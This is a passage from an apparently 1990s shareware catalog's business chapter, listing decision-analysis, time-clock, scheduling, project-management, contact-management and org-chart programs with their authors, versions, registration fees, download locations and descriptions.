SeekWell Universal Query + Universal database query, labels, bar codes. See full + description on page 142. + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 305. + + Product: TreePlan for DOS + Author: Decision Support Services (Michael R. Middleton), + 415-673-6217 + Version: 2.1 (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support. + Look for: availability unknown on BBSs; TRED21.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 6 (or contact userID 71330,3445 for + assistance). + PsL#: 10904 + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + Decision tree software for analyzing risky decisions. Shows + sequence of decisions and events over time. Prints tree + diagrams. Solves for optimal strategy. Performs sensitivity + analysis of probability, value, and risk attitude. Includes + exponential utility, automatic EVPI, Bayes revision, and 500 + lines of context-sensitive on-screen help. User manual has + complete command reference, step-by-step tutorial, and two + application examples explaining decision tree concepts and + terminology. + + Chapter 7, "Business" 276 + + + + Product: UDECIDE + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.06 (11-10-92) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; UDCIDE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 76703,3046 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Helps you make decisions such as which software or hardware to + purchase; ratings surveys; which project to pursue; selecting + colleges, movies, stocks, or wines. You enter a list of + elements to evaluate the contenders, giving each a weight. Then + you enter the options, assigning values to each element. Then + sort to obtain an ordered list of the best options. Or perform + what-if analyses by changing elements or weights. + + + 7.4 Equipment use & maintenance + + Product: Computer System Manager + Tracks computer system hardware/software. See full description + on page 220. + + Product: HOME/OFFICE INVENTORY + Organize personal and business property data. See full + description on page 311. + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 344. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 89. + + Chapter 7, "Business" 277 + + + + Product: TrackEquip + Author: John A. Tulley, +44-(0)1565-880012 + Version: 1.10 (04-30-96) + Needs: IBM PC, DOS 3.3 or better. 512k RAM. + Registration fee: L-35.00 (add L-4.00 for shipping to U.S. + addresses) (add L-4.00 for shipping to Canadian addresses) (add + L-4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on upgrades. 3-month free upgrading allowed. + Look for: TEQP10.ZIP on BBSs; TEQP.ZIP on CompuServe in + CIS:PCAPPS forum LIBrary 6 (or contact userID 100541,2650 for + assistance). + SWREG#: 10650 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + A database system for small to medium sized companies, designed + to track the movement of inspection, measuring and test + equipment. Ensures complete equipment traceability to comply + with ISO9000/BS5750 requirements. Maintains calibration and + verification schedules, keeping full history records for each. + Completely menu driven - Features include: a powerful yet easy- + to-use query system, context sensitive help system, easy + installation, reports, label printing, etc. + + + Product: Vehicle Costs + Author: Graham Ferguson, +61-3-700-3764 + Version: 2.4 (05-01-94) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Hard disk. + Strongly recommended: Epson printer. + Registration fee: $US50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; disks of other shareware. + Look for: availability unknown on BBSs; VEHI24.ZIP on CompuServe + in CIS:CARS forum LIBrary 2 (or contact userID 100026,370 for + assistance). + SWREG#: 2619 + Download size: 146k (about eleven minutes with a 2400 baud modem) + Description: + Reports on costs by category or item over a range of years. + Records fuel cost and consumption. Yearly average cost per mile + price per gallon. No limit to number of vehicles recorded. + Yearly totals of fuel purchased, distance traveled, cost of + parts and service. Notepad to record service and trip details. + Database editor for entry error correction. Tax file to record + Business deductable travel. Suitable for private or fleet use. + + Chapter 7, "Business" 278 + + + + Product: x-SKED3 + Network room/resource scheduling system. See full description + on page 368. + + 7.4.1 Computer-use logging + + Product: PC-TimeClock + Author: KMR Consulting (Kenneth A. Reek), 716-293-3241 + Version: 1.1 (11-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $17.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, mail support; + bonus utilities; disks of other shareware; discounts on + upgrades; registration commissions. 1 free update disk(s) sent + out. + Look for: TIMCLK11.ZIP on BBSs; TIMCLK.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 74034,1441 for + assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of the time you've spent on your computer. Time is + charged to one or more "projects" of your choosing by "punching + in" when you begin work. In addition, projects may be grouped + in different categories, such as business and pleasure. Usage + can then be summarized by project and category, giving total + hours and percentage of use for each project and category. This + is the information you need to justify a deduction for business + use of your computer. + + + Product: PUBLIC ACCESS(tm) + Author: IN/QUEST, LLC (Jim Turner), 303-671-0800 + Version: 2.5 (09-05-94) + Needs: IBM PC, DOS 2.11 or better. 620k RAM; Hard disk. + Strongly recommended: VGA monitor; Hercules monitor; Modem; + Mouse; Epson printer. Procomm Plus v2.x; magnetic swipe + reader; PRODIGY service. + Registration fee: $89.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, newsletter support; 1-month + return policy; runtime license; site license; bonus utilities; + all ASP-wide offers (see page 6); discounts on other products. + 2-month free upgrading allowed. 2 free update disk(s) sent + out. + Look for: PACCS25.EXE on BBSs (multiple files) (call 303-665-6091 + to download it at no charge); PACCS*.EXE on CompuServe in + CIS:PCAPP forum LIBrary 6 (multiple files) (or contact userID + 70505,531 for assistance); PACCS*.EXE on GEnie in IBMPC forum + + Chapter 7, "Business" 279 + + + + LIBrary 4 (multiple files) (or contact userID XTY25572 for + assistance). + Download size: 680k (about 51 minutes with a 2400 baud modem) + Description: + Front-end control menu for public libraries and other business + entities offering casual PC use to the general public. Will + launch any DOS or MS-Windows based programs. Site may offer + controlled access to application programs and (via modem) to + online data communications (if you have PCPLUS 2.01). Up to 12 + step autologon. Patrons pay with cash or credit card. Credit + cards are pre-validated before access allowed. Set rates by + the minute, long distance minute, page, session, and overall + event. + + + 7.5 Employee management/scheduling + + Product: Business Clock Link + Author: BizMark Development (Mark Hicks), 318-949-4399 + Version: 1.00 (12-06-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $175.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. + Look for: availability unknown on BBSs; BCLINK.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 6 (or contact userID 70262,114 for + assistance). + PsL#: 11665 + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + A networkable PC time clock with real-time job reporting + system, "blue collar" E-mail, clock-in/out animation, on-line + worker discipline, and "ticker tape" reporting of all + transactions. Written in C with dBASE file format. Oriented + toward the needs of Managers, so it is called "The Clock That + Means Business". Great use for old XT's. + + + Product: Calendar Quick + Author: Logic Pulse (Brian Holdsworth), 803-871-9812 + Version: 3.10 (02-10-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; SVGA + monitor; Hard disk; HP DeskJet printer; HP LaserJet printer; + Postscript printer; Network (LAN). + Registration fee: $39.95 (add $4.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, fax, CompuServe, mail support; bonus + + Chapter 7, "Business" 280 + + + + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: CALQCK31.ZIP on BBSs; CALQCK.ZIP on CompuServe in + CIS:WINPROD forum LIBrary 4 (or contact userID 73313,3443 for + assistance). + SWREG#: 7450 + Download size: 565k (about 42 minutes with a 2400 baud modem) + Description: + Fast and powerful calendar and project/employee scheduling in + one. Handles workgroup scheduling without requiring a network. + Create 12 different calendar and time-line views with full + WYSIWYG printing. Manage time, people, and resources. Create + Gantt Charts and to-do's. Export calendars to any Windows + application. Add "ticklers". Track multi-day and recurring + events. Great interface with tabbed dialog boxes. Works great + with Windows 95 or Windows 3.1x. Win Mag "Superior Shareware." + + + Product: DAYO SERVICE DISPATCH + Manage service & repair work; dispatch tech. See full + description on page 284. + + Product: DELEGATOR for Windows + Author: Madrigal Soft Tools Inc., 604-920-3910 + Version: 1.0 (10-25-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $39.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs; DLGW10.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 7 (or contact userID 75357,1100 + for assistance). + SWREG#: 8199 + PsL#: 14274 + Download size: 597k (about 45 minutes with a 2400 baud modem) + Description: + Oriented for line managers and coordinators rather than project + specialists. It helps managers to: + * track diverse assignments given to many people; + * plan staff workloads; + * plan and monitor projects with many tasks and people; + * communicate priorities and expectations; + * evaluate staff performance over long periods; + * remember important annual dates and personal milestones; + * track their own tasks, goals and performance. + Easy to use. + + Chapter 7, "Business" 281 + + + + Product: FBScheduler + Author: Forrest D. Bruner + Version: 1.00 (10-20-95) + Needs: IBM PC, DOS 5.0 or better. 512k RAM; CGA monitor; Hard + disk; Mouse. Printer must support compressed mode (132 + characters across). + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 6 months of unlimited + CompuServe, mail support; bonus utilities. + Look for: availability unknown on BBSs. + PsL#: 14263 + Download size: 1965k (about 146 minutes with a 2400 baud modem) + Description: + An employee/job scheduling system for a traditional, 3 shift + operation. Computer generation of preliminary schedules + supported. Holiday, Incidental, and First and Second Day Off + Overtime tracked. Days off must be sequential but may wrap + from Sunday to Monday. Job Restrictions supported. Vacation + Scheduling supported. Eliminates the chance of scheduling to + people to the same job at the same time and greatly reduces the + chance of failing to schedule a job! + + + Product: Flexitime/Time Logging + Author: HJS Systems, +44-(0)1203-388031 + Version: 5.32 (06-01-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: L-35.00 (add L-10.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, mail support; 1-month return policy; LAN + license; site license; registration commissions. 3-month free + upgrading allowed. + Look for: FTTLV532.ZIP on BBSs (call +44-(0)1203-352326 to + download it at no charge); FTTLV532.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 5 (or contact userID 100102,1012 for + assistance). + SWREG#: 3970 + PsL#: 14086 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Designed to achieve seamless integration between recording + employee attendance (when they are at work) and what they are + doing with that time. The organisation can then monitor + attendance, holidays, personal and team performance and produce + billing information for clients. Data can also be used by and + exported to other systems. + + Chapter 7, "Business" 282 + + + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 303. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 314. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 122. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 288. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 285. + + Product: Time Keeper + Author: Custom Computer Solutions, 516-369-4191 + Version: 2.7 (10-07-95) + Needs: IBM 80386, Windows 3.1 or better. 8k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; VBRUN300.DLL. + Registration fee: $50.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited fax, + CompuServe, mail support; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 6-month + free upgrading allowed. + Look for: TK27.ZIP on BBSs; TK27.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 0 (or contact userID 102703,554 for assistance). + Download size: 2800k (about 208 minutes with a 2400 baud modem) + Description: + A database to record and report on employee attendance. Records + all times worked including OT and Comp Time. Records time off + including vacation, sick, holiday, Comp Time, and any other. + Electronic "punch clock" can be used by those employees that + have access to a pc running the Time Keeper. Professional + reports are used to retrieve the stored data. Featured in + Windows Magazine Superior Shareware Section of the August '95 + edition. + + Chapter 7, "Business" 283 + + + + Product: Timeclock I + Author: Faught Data Systems, Inc., 800-394-4839 + Version: 2.4s (04-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $79.95 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, newsletter + support; LAN license; bonus utilities; discounts on other + products. + Look for: TC24S.ZIP on BBSs; TC24S.EXE on CompuServe in CIS:PCAPP + forum LIBrary 6 (or contact userID 73770,1574 for assistance). + Download size: 303k (about 23 minutes with a 2400 baud modem) + Description: + Turn your PC into a timeclock and save hundreds of dollars! + Logs employees' "in" and "out" times via keyboard or barcode + and automatically tabulates their hours at the end of each pay + period. Calculates overtime and tracks sick, vacation and + holiday hours. Tracks project/billable hours and if your + networked, employees can "punch" right from their own stations. + Send announcements via the program's bulletin board, or private + messages to individual employees. Eliminates mistakes and + saves time. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 291. + + Product: x-OUT3 + Network in/out tracking system. See full description on + page 367. + + Product: x-OUT4 + Network in-out tracking system for Windows. See full + description on page 368. + + + 7.6 Project management + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 220. + + Chapter 7, "Business" 284 + + + + Product: DAYO SERVICE DISPATCH + Author: TJS LAB, Inc., 407-291-3960 + Version: 3.20+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $299.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOS1.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOS1.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Designed for service and/or repair businesses, departments, or + organizations. Use it to initiate service or work orders, + record any notes, dispatch technicians, record inventory and + labor used, and then close and create an invoice for services + rendered. Features include: customer and inventory maintenance, + warehouse transfers, pick tickets or pull sheets, invoicing, + laser forms, and many reports. + + + Product: DELEGATOR for Windows + For those manage or coordinate others. See full description on + page 280. + + Product: Money Math for Windows + Financial analysis mathematical tools. See full description on + page 250. + + Product: RPMSHARE + Author: South Pointe Software, 604-538-2326 + Version: 3.42 (12-05-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; EGA monitor; Hard + disk; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on upgrades. 12-month free + + Chapter 7, "Business" 285 + + + + upgrading allowed. 4 free update disk(s) sent out. Employee + time/assignment planning literature. + Look for: RPMSHA.EXE on BBSs; RPMSHA.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 6 (or contact userID 70254,3443 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A multi-resource/multi-projects management program unlike any + other. Very attractive to the horizontal market of individual, + small firm and home office users. It shows who is over/ + underloaded, by how much in hours and currency, on which + projects/assignments, and on what dates. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 291. + + 7.6.1 Project bidding & costing + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 354. + + Product: Power Planner + Project planning system for Windows. See full description on + page 287. + + Product: ProDev*EPRICE + Author: Pro Dev Software (George Abbott), 616-788-2243 + Version: 6.0 (12-06-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; CGA monitor; Hard + disk. ProDev*QUOTE software. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support. + Look for: PDEPRIC6.ZIP on BBSs; PDEPRI.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72617,1266 for + assistance). + Download size: 283k (about 21 minutes with a 2400 baud modem) + Description: + Provides for converting weekly price service data files for + electrical, heating, plumbing and air conditioning items to the + ProDev*QUOTE file format to automatically update material + prices. Includes sample files for USA, Australian and UK price + services. The user subscribes separately to the desired price + service. + + Chapter 7, "Business" 286 + + + + Product: ProDev*QUOTE Quote/Bid System + Author: Pro Dev Software (George Abbott), 616-788-2243 + Version: 6.0c (05-24-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $65.00 (Canadian dollars) (add $5.00 (Canadian + dollars) for shipping to U.S. addresses) (add $5.00 (Canadian + dollars) for shipping to Canadian addresses) (add $8.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support. + 3-month return policy. + Look for: PDQUOT6C.ZIP on BBSs; PDQUOT.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 15 (or contact userID 72617,1266 for + assistance). + Download size: 418k (about 31 minutes with a 2400 baud modem) + Description: + Packed with features for any type/size business from + consultants to one-person contractors to small/large + manufacturers. Used by many electrical, heating, plumbing, + remodeling, major construction contractors, florists, flooring + stores, landscape contractors, printing shops, maintenance + services, well... just about any type business. The system + defaults are highly configurable. Pull-down menus, point & + shoot browse and F1 help windows. + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 288. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 282. + + 7.6.2 Project scheduling + + Product: Calendar Quick + Calendar Quick scheduling tool. See full description on + page 279. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 122. + + Chapter 7, "Business" 287 + + + + Product: Power Planner + Author: Sphygmic Software Limited, +44-1792-323-002 + Version: 1.24 (02-16-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM. + Registration fee: $40.00 + Registration benefits: Full program functionality; 3 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; PPLAN.ZIP on CompuServe + in CIS:TCMFORUM forum LIBrary 3 (or contact userID 100343,1144 + for assistance). + SWREG#: 7640 + Download size: 2900k (about 215 minutes with a 2400 baud modem) + Description: + Full featured project planning software for Windows. Includes + critical path analysis, resource scheduling by priority, Earned + value calculation. Graphical network editor, Gantt charts in + detail or summary, Resource histograms, Earned Value 'S' + curves. Interactive SQL queries and report writer. Exorts and + imports to MS Project, any system with MPX interface, and + Artemis 7000. Supports up to 30,000 activities. + + + Product: A Project/Event Planner + Author: Sapphire Software Inc., 808-395-5587 + Version: 3.4 (12-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $37.00 + Registration benefits: printed manual; 31/2" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + limited return policy; bonus utilities; discounts on upgrades. + Look for: APLANR34.ZIP on BBSs; APLANR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 750 + PsL#: 11168 + Download size: 282k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + (Finalist in 1994 PC Magazine/Ziff-Davis Shareware Awards) Use + for quick overall project planning, activity and resource + scheduling. Can assign income/cost amounts to events/resources + to estimate project income/cost. Can link events where start/ + end times are automatically calculated. Can shift all events + forward/backward in time. Handles multiple calendars. Allows + free-from drawing of events anywhere on a scale of hr/day/week/ + month/yr. On-line help, sample plans provided. + + Chapter 7, "Business" 288 + + + + 7.7 Client management/scheduling + + Product: 2DO Personal Task Manager + Personal task and contact manager for Windows. See full + description on page 132. + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 299. + + Product: DAYO BAR CODE 3 OF 9 + Print 3 of 9 barcodes onto Epson/IBM printer. See full + description on page 269. + + Product: DAYO MEMBERSHIP + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.40+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYODE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYODE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + An application designed to track membership for an association + or organization. The ability to maintain records for donations, + dues, payments and/or invoices has also been incorporated into + the package. Use it to record member information and + optionally, maintain a simple accounting system for dues and/or + donations. Many reports and reporting routines are included in + this package, ie: members list, notes, statements, labels, + payments, form letters and much more. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.42+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $189.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 289 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOCE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOCE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Designed to aid the business or, individual sales person, in + the creation of price books and quotes/sales orders, and in the + management of contracts and calendar events. It is by default a + multiuser system, allowing almost unlimited numbers of users to + have the aility to simultaneously access the same data on a PC + based LAN/network. + + + Product: DAYO TIME & BILLING + Inventory, invoicing, receivables, projects. See full + description on page 254. + + Product: FeeRate for Windows 95 / NT + Hourly fee rate calculator for professionals. See full + description on page 249. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 296. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 126. + + Product: NAMEBASE + Author: Elk Creek Software (Michael J. Paulick) + Version: 3.2 (02-26-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support. + Look for: NAME32.ZIP on BBSs; NAME32.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of people and companies. Stores 4 phone numbers, 2 + addresses, 2 dates, and thousands of characters of notes for + each record. Full mouse support. Prints a pocket-size address + book, labels, rolodex cards, envelopes, and reports. Creates + mail-merge files for use with most word processors. Dials the + + Chapter 7, "Business" 290 + + + + phone. Displays multiple records at once. Extremely easy to + use. Type the first few characters of any person's name and + you are immediately viewing all information about that person. + + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 310. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 284. + + Product: Shareware Tracker + Data tracking program for shareware authors. See full + description on page 640. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 282. + + + 7.8 Organization charts + + See also: Graphics, Drawing/editor programs. + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 481. + + Product: Top Draw + Powerful, fast, and easy drawing program. See full description + on page 485. + + Chapter 7, "Business" 291 + + + + Product: TreeChart + Author: FineLine Software, (+353)-91-37560 + Version: 2.00 (08-23-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Mouse. TrueType or ATM fonts. + Registration fee: $42.00 (add $13.86 for shipping to U.S. + addresses) (add $13.86 for shipping to Canadian addresses) (add + $13.86 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; lifetime return policy; bonus utilities; all ASP-wide + offers (see page 6). 6-month free upgrading allowed. + Look for: TCF200.ZIP on BBSs; TCF200.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 70624,462 for + assistance). + SWREG#: 1927 + PsL#: 11053 + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A package for organization charts or illustrating other + hierarchical information. No drawing skills required: box + sizing, positioning and line routing all done automatically. + Numerous chart styles/box shapes. Layouts (style guides) for + consistent appearance. Print preview, fit-to-page, + titles+border. Outlining: view/print chart, management or + single departments. Supports assistants and shared employees. + Imports text, exports text & fully scaleable WMF pictures. + + + 7.9 Specific-field systems + + 7.9.1 Construction, installation & repair + + Product: J-Works + Author: MicroWorks Inc., 615-896-3966 + Version: 2.2 (03-01-95) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: VGA monitor; Hard disk; HP LaserJet + printer; Mouse; Epson printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited phone, fax, + mail support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + + Chapter 7, "Business" 292 + + + + 12-month free upgrading allowed. 1 free update disk(s) sent + out. Printed manual, 90 day free technical support. + Look for: JWORKS22.ZIP on BBSs. + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Automates the process of calculating the load for a house to + determine the correct size heating and cooling system required. + It requires that you use ACCA's Manual J booklet to insert the + correct HTM's for your particular region. You then insert the + building dimensions for your house and it does the rest. + Supports "Room-by-Room" and "Whole-house" load calcul ations. + Mouse support. Includes a CFM calculator, auto print capability + for presentation to customers. + + + Product: TrackEquip + Tracks inspection, measuring & test equipment. See full + description on page 276. + + 7.9.2 Farming & ranching + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 534. + + Product: MapDraw + Deed plotter, map drawing (metes and bound. See full + description on page 348. + + 7.9.3 Food services + + Product: INVENTORY & COST CONTROL + Author: First Step Software (Larry Larsen), 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $150.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: INVCTL42.ZIP on BBSs; INVCTL.ZIP on CompuServe in + CIS:PCAPP forum 